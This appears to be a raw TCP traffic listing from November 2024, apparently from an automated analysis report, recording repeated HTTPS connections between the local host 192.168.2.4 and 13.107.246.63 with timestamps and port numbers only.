                                                                                                                                                                                                Nov 23, 2024 16:54:55.616981030 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:56.779596090 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:56.780363083 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:56.780400038 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:56.780867100 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:56.780872107 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.115803957 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.116415024 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.116499901 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.116790056 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.116806030 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.253994942 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.257452965 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.257621050 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.257622004 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.257622004 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.259852886 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.259896040 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.259973049 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.260087967 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.260097027 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.378468037 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.378704071 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.378935099 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.378997087 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.379364967 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.379378080 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.379393101 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.379395008 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.379934072 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.379945040 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.382009029 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.382345915 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.382361889 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.383179903 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.383189917 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.567578077 CET49971443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.567603111 CET4434997113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.569252968 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.572303057 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.572376966 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.572413921 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.572468996 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.572530031 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.585025072 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.585025072 CET49972443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.585077047 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.585103035 CET4434997213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.603200912 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.603288889 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.603363991 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.606520891 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.606558084 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.821135044 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.824203014 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.824284077 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.824457884 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.824457884 CET49975443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.824497938 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.824521065 CET4434997513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.826906919 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.826986074 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.827151060 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.827189922 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.827264071 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.827421904 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.827430010 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830195904 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830205917 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830238104 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830260992 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830265045 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830305099 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830343962 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830343962 CET49974443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830348015 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830365896 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830368042 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830389023 CET4434997413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830389023 CET49973443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.830403090 CET4434997313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832473993 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832523108 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832535982 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832612038 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832631111 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832695961 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832767963 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832794905 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832828999 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:57.832865000 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:58.980976105 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:58.981554031 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:58.981565952 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:58.981903076 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:58.981906891 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.397559881 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.398102999 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.398128033 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.398660898 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.398669004 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.419061899 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.422063112 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.422111988 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.422113895 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.422283888 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.422283888 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.422285080 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.425118923 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.425213099 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.425297976 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.425462961 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.425502062 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.591623068 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.592158079 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.592189074 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.592505932 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.592513084 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.711524010 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.712692976 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.712738991 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.713016987 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.713028908 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.718882084 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.720719099 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.720733881 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.721122026 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.721127033 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.723689079 CET49976443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.723706007 CET4434997613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.849180937 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.852493048 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.852705956 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.852705956 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.852705956 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.855031967 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.855109930 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:59.855182886 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.855351925 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:59.855371952 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.057888985 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.057972908 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.058137894 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.072772026 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.072772026 CET49979443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.072789907 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.072802067 CET4434997913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.145951986 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.146056890 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.146152020 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.161228895 CET49977443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.161251068 CET4434997713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.165085077 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.165155888 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.165245056 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.166574001 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.166615009 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.169122934 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.169167042 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.169198036 CET49980443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.169214964 CET4434998013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.170588970 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.173867941 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.173934937 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.173945904 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.174016953 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.174062014 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.197014093 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.197022915 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.197057009 CET49978443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.197062016 CET4434997813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200105906 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200133085 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200206041 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200705051 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200773954 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200798988 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200826883 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200839996 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200897932 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:00.200913906 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.217457056 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.219974041 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.220030069 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.220418930 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.220433950 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.657660961 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.658267021 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.658305883 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.658694983 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.658709049 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.660604000 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.663775921 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.663839102 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.663897991 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.663897991 CET49981443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.663934946 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.663959026 CET4434998113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.666415930 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.666451931 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.666531086 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.666680098 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.666697979 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.986022949 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.986426115 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.986469030 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:01.986850977 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:01.986862898 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.012465954 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.012833118 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.012882948 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.013192892 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.013209105 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.018485069 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.018838882 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.018855095 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.019290924 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.019301891 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.100917101 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.104099035 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.104154110 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.104161978 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.104213953 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.104262114 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.104262114 CET49982443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.104295969 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.104331017 CET4434998213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.106877089 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.106924057 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.107021093 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.107124090 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.107141972 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.430953026 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.434137106 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.434218884 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.434303999 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.434303999 CET49983443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.434350014 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.434376001 CET4434998313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.436695099 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.436739922 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.436815023 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.436947107 CET49988443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.436963081 CET4434998813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.455626011 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.459532976 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.459579945 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.459610939 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.459672928 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.459717989 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.459717989 CET49985443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.459762096 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.459789038 CET4434998513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.461641073 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.461673975 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.461749077 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.461785078 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.461864948 CET49989443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.461877108 CET4434998913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.465090990 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.465157986 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.465198040 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.465198994 CET49984443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.465217113 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.465236902 CET4434998413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.466869116 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.466881037 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:02.466955900 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.467065096 CET49990443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:02.467078924 CET4434999013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.453876972 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.454585075 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.454638004 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.455061913 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.455075979 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.900377035 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.903543949 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.906388998 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.906586885 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.906586885 CET49986443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.906603098 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.906615973 CET4434998613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.907464027 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.909022093 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.909054995 CET4434999113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.909346104 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.909358025 CET49991443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.909421921 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.909795046 CET49987443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:55:03.909815073 CET4434998713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:55:03.909908056 CET49991443192.168.2.413.107.246.63
